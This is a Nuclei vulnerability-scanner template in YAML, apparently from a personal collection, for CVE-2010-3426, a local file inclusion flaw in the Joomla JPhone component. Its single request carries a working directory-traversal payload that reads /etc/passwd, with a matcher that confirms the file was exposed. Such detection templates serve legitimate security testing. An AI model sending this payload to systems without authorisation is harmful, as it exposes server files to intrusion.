my-nuclei-templates/CVE-2010-3426.yaml

35 lines
1.0 KiB
YAML

id: CVE-2010-3426
info:
name: Joomla! Component Jphone 1.0 Alpha 3 - Local File Inclusion
author: daffainfo
severity: high
description: A directory traversal vulnerability in jphone.php in the JPhone (com_jphone) component 1.0 Alpha 3 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/14964
- https://www.cvedetails.com/cve/CVE-2010-3426
- http://packetstormsecurity.org/1009-exploits/joomlajphone-lfi.txt
- http://www.exploit-db.com/exploits/14964
remediation: Upgrade to a supported version.
classification:
cve-id: CVE-2010-3426
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/02/17